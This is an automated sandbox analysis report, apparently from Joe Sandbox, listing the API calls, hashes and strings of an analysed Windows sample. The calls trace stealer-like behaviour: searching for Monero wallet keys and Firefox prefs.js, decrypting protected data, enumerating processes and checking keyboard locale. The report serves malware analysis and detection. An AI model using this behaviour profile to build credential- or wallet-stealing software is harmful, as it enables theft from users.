                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*
                      • API String ID: 671575355-2848263008
                      • Opcode ID: e9e4c2080c383325aa0f174e275d71741ed6d9e5128f18c9a4716fb2cb39c1e4
                      • Instruction ID: d84d3b38120dc258fe4cb8ce6034e4e2a78415416661d8be6979e32facc4e920
                      • Opcode Fuzzy Hash: e9e4c2080c383325aa0f174e275d71741ed6d9e5128f18c9a4716fb2cb39c1e4
                      • Instruction Fuzzy Hash: 1C518AB1550218ABD720EB70DC99FEE777CBB58301F408589F60992190EB789BC8CFA5
                      APIs
                      • wsprintfA.USER32 ref: 00553EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 00553EDA
                      • StrCmpCA.SHLWAPI(?,00560FAC), ref: 00553F08
                      • StrCmpCA.SHLWAPI(?,00560FB0), ref: 00553F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0055406C
                      • FindClose.KERNEL32(000000FF), ref: 00554081
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s
                      • API String ID: 180737720-4073750446
                      • Opcode ID: 5be10a7a47545d9d5a4ddb7ed8d6ecca863d1e697075e10f3d1d992c0c69e382
                      • Instruction ID: 3a2c943eeae5c1b31f3e56dc2bf6dc11c673c420c55e6ef6cc633be02eb5b601
                      • Opcode Fuzzy Hash: 5be10a7a47545d9d5a4ddb7ed8d6ecca863d1e697075e10f3d1d992c0c69e382
                      • Instruction Fuzzy Hash: 73518EB1500219BBDB24FBB0DC59EFA777CBB44301F008589B65996040DB79EB89CF65
                      APIs
                      • wsprintfA.USER32 ref: 0054ED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 0054ED55
                      • StrCmpCA.SHLWAPI(?,00561538), ref: 0054EDAB
                      • StrCmpCA.SHLWAPI(?,0056153C), ref: 0054EDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0054F2AE
                      • FindClose.KERNEL32(000000FF), ref: 0054F2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: a333c05285d4963d55e2d798cbccf320a711b56104f115c23e3c14cec2014cfe
                      • Instruction ID: 486ff4cc767123a5fac0bb584b301631ae7ed16b74af6591e34bbe1b86cb7b05
                      • Opcode Fuzzy Hash: a333c05285d4963d55e2d798cbccf320a711b56104f115c23e3c14cec2014cfe
                      • Instruction Fuzzy Hash: 8DE106729111195AEB54FB60CC66EEE7B38BF94301F40429AB90B62452EF306F8ECF51
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !n<$+]}p$/Z}$/m9$MZp_$P"J{$d!.z$i7($jFv$u#H$LC?$}l
                      • API String ID: 0-4026251849
                      • Opcode ID: e9403752a2c9181891af048fb3d80d7116f516ee21bf298bbfdefbe8a2c4b6e5
                      • Instruction ID: 84576f8ed75eed73252bf9e32fa4904c2b40662699a4e0360f234ef5c08c5035
                      • Opcode Fuzzy Hash: e9403752a2c9181891af048fb3d80d7116f516ee21bf298bbfdefbe8a2c4b6e5
                      • Instruction Fuzzy Hash: B9A25CF360C2049FE304AE2DEC8567BBBD9EF94760F1A853DEAC4C3744E93598058696
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005615B8,00560D96), ref: 0054F71E
                      • StrCmpCA.SHLWAPI(?,005615BC), ref: 0054F76F
                      • StrCmpCA.SHLWAPI(?,005615C0), ref: 0054F785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0054FAB1
                      • FindClose.KERNEL32(000000FF), ref: 0054FAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: 2450c32237b4c24d5d2281e2d4b05470d8092b8e62874258cba5339ef6e90989
                      • Instruction ID: 5abe8a42dcb01abe18968737260197d16a9184e07284bc86d766a53c2c46c932
                      • Opcode Fuzzy Hash: 2450c32237b4c24d5d2281e2d4b05470d8092b8e62874258cba5339ef6e90989
                      • Instruction Fuzzy Hash: 9AB174719101199BDB24FF64DC69EEE7B78BF94301F4086A9A80A97141EF306B4DCF92
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0056510C,?,?,?,005651B4,?,?,00000000,?,00000000), ref: 00541923
                      • StrCmpCA.SHLWAPI(?,0056525C), ref: 00541973
                      • StrCmpCA.SHLWAPI(?,00565304), ref: 00541989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00541D40
                      • DeleteFileA.KERNEL32(00000000), ref: 00541DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00541E20
                      • FindClose.KERNEL32(000000FF), ref: 00541E32
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: c12959f89d3e859727b256b340f39b13bd87ba66f6a073d7a9130be7c5cc3e3f
                      • Instruction ID: daf8c50fbbee7dde2974cfddf6bde6fd4dce5af52bbf2213185da11359eefa0b
                      • Opcode Fuzzy Hash: c12959f89d3e859727b256b340f39b13bd87ba66f6a073d7a9130be7c5cc3e3f
                      • Instruction Fuzzy Hash: 6F12D0719101199BDB15EB60CCAAEEE7B78BF94301F40469AB90666091FF306F8DCF91
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00560C2E), ref: 0054DE5E
                      • StrCmpCA.SHLWAPI(?,005614C8), ref: 0054DEAE
                      • StrCmpCA.SHLWAPI(?,005614CC), ref: 0054DEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0054E3E0
                      • FindClose.KERNEL32(000000FF), ref: 0054E3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: \*.*
                      • API String ID: 2325840235-1173974218
                      • Opcode ID: 3ad2c41210ea8dfb2f26ab15b338d9dc43c798f22d15c921525246c959819eb8
                      • Instruction ID: 97cef51a226f217682985b3e982d204ecac06d4f7c317bdda5e420b4ada69505
                      • Opcode Fuzzy Hash: 3ad2c41210ea8dfb2f26ab15b338d9dc43c798f22d15c921525246c959819eb8
                      • Instruction Fuzzy Hash: D3F191718141199ADB15EB60CCA9EEE7B38BF94301F9042DBB80A62091EF346F4DCF55
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005614B0,00560C2A), ref: 0054DAEB
                      • StrCmpCA.SHLWAPI(?,005614B4), ref: 0054DB33
                      • StrCmpCA.SHLWAPI(?,005614B8), ref: 0054DB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0054DDCC
                      • FindClose.KERNEL32(000000FF), ref: 0054DDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 81a923702d91f5e7a205b85f057f43f17d84eca4077513fb123eb6a54ee38d41
                      • Instruction ID: 361af7dcf32aef6e0e1f78b9673c055ec9175f796e2a54fdafd08a1788224706
                      • Opcode Fuzzy Hash: 81a923702d91f5e7a205b85f057f43f17d84eca4077513fb123eb6a54ee38d41
                      • Instruction Fuzzy Hash: 4B916572910105A7DB14FB70DC6A9ED7B7CBBC8305F408659FD0A96185FE34AB0D8BA2
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,005605AF), ref: 00557BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00557BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00557C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00557C62
                      • LocalFree.KERNEL32(00000000), ref: 00557D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      • API String ID: 3090951853-4001269591
                      • Opcode ID: 133fe03b66b05be4cfcd34f6c262daf7e539cc49579f24401a7c3cf363cd7ad5
                      • Instruction ID: 07f3c02ee3c202f723d2e26ee8da434637e3f1ba61d816f88894e493866ed38c
                      • Opcode Fuzzy Hash: 133fe03b66b05be4cfcd34f6c262daf7e539cc49579f24401a7c3cf363cd7ad5
                      • Instruction Fuzzy Hash: 7041317194011DABDB24DB94DCA9BEDBB74FF48701F2042DAE40962191DB342F89CF61
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: j\j$j\j$)K~S$/7$@vc]$Yo{$ov[o
                      • API String ID: 0-93978172
                      • Opcode ID: 8c65bcff9456bc62811789093acb95268b2dad0adad0657f9165737bb68b5393
                      • Instruction ID: 077c87c095dcae4748cccfb74ae9551360f3cb67dad80053842555b54920c891
                      • Opcode Fuzzy Hash: 8c65bcff9456bc62811789093acb95268b2dad0adad0657f9165737bb68b5393
                      • Instruction Fuzzy Hash: 0FB238F3A0C2149FE3046E2DEC8567ABBE9EF94720F1A493DEAC5C3740E63558048697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: &[s$6O4$7?+o$YX{\$gEf$o4=$*y
                      • API String ID: 0-559821975
                      • Opcode ID: b6cbd13e8717eda8ddb88ba63e543dd48f9eeb8f88310d72f0f0b0b31558e117
                      • Instruction ID: a5985571db38a96dc013ba22c402339a98026bd23ec644c4c21937860d0287c6
                      • Opcode Fuzzy Hash: b6cbd13e8717eda8ddb88ba63e543dd48f9eeb8f88310d72f0f0b0b31558e117
                      • Instruction Fuzzy Hash: 5EB218F3A08210AFE304AE2DEC8567AB7E9EF94720F1A493DE6C4C7744E63558448797
                      APIs
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00560D73), ref: 0054E4A2
                      • StrCmpCA.SHLWAPI(?,005614F8), ref: 0054E4F2
                      • StrCmpCA.SHLWAPI(?,005614FC), ref: 0054E508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0054EBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 433455689-1173974218
                      • Opcode ID: fcf4b5c02a7609ec2ad5cc0596d238651198824d12de54c6e0fcba03286503ee
                      • Instruction ID: 92de1f8ba9523055a40bdc1c4033d087b780ebf467ebe43ece16487fd614e6fc
                      • Opcode Fuzzy Hash: fcf4b5c02a7609ec2ad5cc0596d238651198824d12de54c6e0fcba03286503ee
                      • Instruction Fuzzy Hash: 8C1212719101199ADB14FB70DCAAEED7B38BF94301F40469AB90A56091FE346F4DCF92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 5<{]$A$j*$Q8w$go'$v&_O$vMy
                      • API String ID: 0-3981917027
                      • Opcode ID: 24ba4624728350301f04ae71f931b5b22ecf8455e3ae1da031b97ac93c63bda2
                      • Instruction ID: 6659ec2cd1edde65ff8470e9ce9820ff2a2f15ca51a2760e36d6fdc8bf2e44e1
                      • Opcode Fuzzy Hash: 24ba4624728350301f04ae71f931b5b22ecf8455e3ae1da031b97ac93c63bda2
                      • Instruction Fuzzy Hash: F6B2F7F3A082049FE304AE2DEC8577ABBE5EF94720F16893DE6C4C3744E63598058696
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: "bWM$"]$&]$q1>q$ri@$_xQ
                      • API String ID: 0-2963833353
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: +Wn$ET}$E}$ZW{W$j,w$y/v<
                      • API String ID: 0-3178496043
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: CF+G$D?$K0/?$]jl'$]jl'$a(}
                      • API String ID: 0-652231954
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                      • LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID: NT
                      • API String ID: 4291131564-3872220154
                      APIs
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0054C871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0054C87C
                      • lstrcat.KERNEL32(?,00560B46), ref: 0054C943
                      • lstrcat.KERNEL32(?,00560B47), ref: 0054C957
                      • lstrcat.KERNEL32(?,00560B4E), ref: 0054C978
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlen
                      • String ID:
                      • API String ID: 189259977-0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: !n<$LS|/$bY6$bcfn$}5#e
                      • API String ID: 0-1327736982
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 0055696C
                      • sscanf.NTDLL ref: 00556999
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005569B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005569C0
                      • ExitProcess.KERNEL32 ref: 005569DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      • API String ID: 2533653975-0
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0054724D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00547254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00547281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005472A4
                      • LocalFree.KERNEL32(?), ref: 005472AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 2609814428-0
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0055961E
                      • Process32First.KERNEL32(00560ACA,00000128), ref: 00559632
                      • Process32Next.KERNEL32(00560ACA,00000128), ref: 00559647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0055965C
                      • CloseHandle.KERNEL32(00560ACA), ref: 0055967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,00545184,40000001,00000000,00000000,?,00545184), ref: 00558EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0102F290,00000000,?,00560E10,00000000,?,00000000,00000000), ref: 00557A63
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00557A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0102F290,00000000,?,00560E10,00000000,?,00000000,00000000,?), ref: 00557A7D
                      • wsprintfA.USER32 ref: 00557AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      • Opcode ID: 2d3e5e8b4172441975bad85ba95de534a54b2a4c7a569446806640a355a4b17d
                      • Instruction ID: 745be23eac5a31053389751bde1a19abe734283e5445a4c9f54f1fc9edd83371
                      • Opcode Fuzzy Hash: 2d3e5e8b4172441975bad85ba95de534a54b2a4c7a569446806640a355a4b17d
                      • Instruction Fuzzy Hash: 4B11A1B1A45218EBEB20CF54DC59FAABB78FB04721F10479AEA0A932C0D7781E44CF51
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: />gn$7Z;$g@my
                      • API String ID: 0-3181801268
                      • Opcode ID: ad39205665883cf52c553776a473db3e09539fb952a61e1db6386bee723d918a
                      • Instruction ID: 9b2eab824cf036b936e0755eefba7829862939c7003f4a98b42353fe2fefce55
                      • Opcode Fuzzy Hash: ad39205665883cf52c553776a473db3e09539fb952a61e1db6386bee723d918a
                      • Instruction Fuzzy Hash: 06B2E5F360C2049FE708AF29EC8577ABBE5EB94320F16493DEAC587744EA3558048797
                      APIs
                      • CoCreateInstance.COMBASE(0055E118,00000000,00000001,0055E108,00000000), ref: 00553758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005537B0
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00549B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00549BA3
                      • LocalFree.KERNEL32(?), ref: 00549BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotect
                      • String ID:
                      • API String ID: 2068576380-0
                      • Opcode ID: d002779429969e89fce2df12d7d17a71782420ceae90462e98fea62150e0966c
                      • Instruction ID: 8bf8337acb44105576a3a313892c6ef78d3574eb38ac20922191c8a9521130c3
                      • Opcode Fuzzy Hash: d002779429969e89fce2df12d7d17a71782420ceae90462e98fea62150e0966c
                      • Instruction Fuzzy Hash: 7311C9B8A00209EFDB04DF94D985EAE77B5FF88304F108599E915A7350D774AE10CFA1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
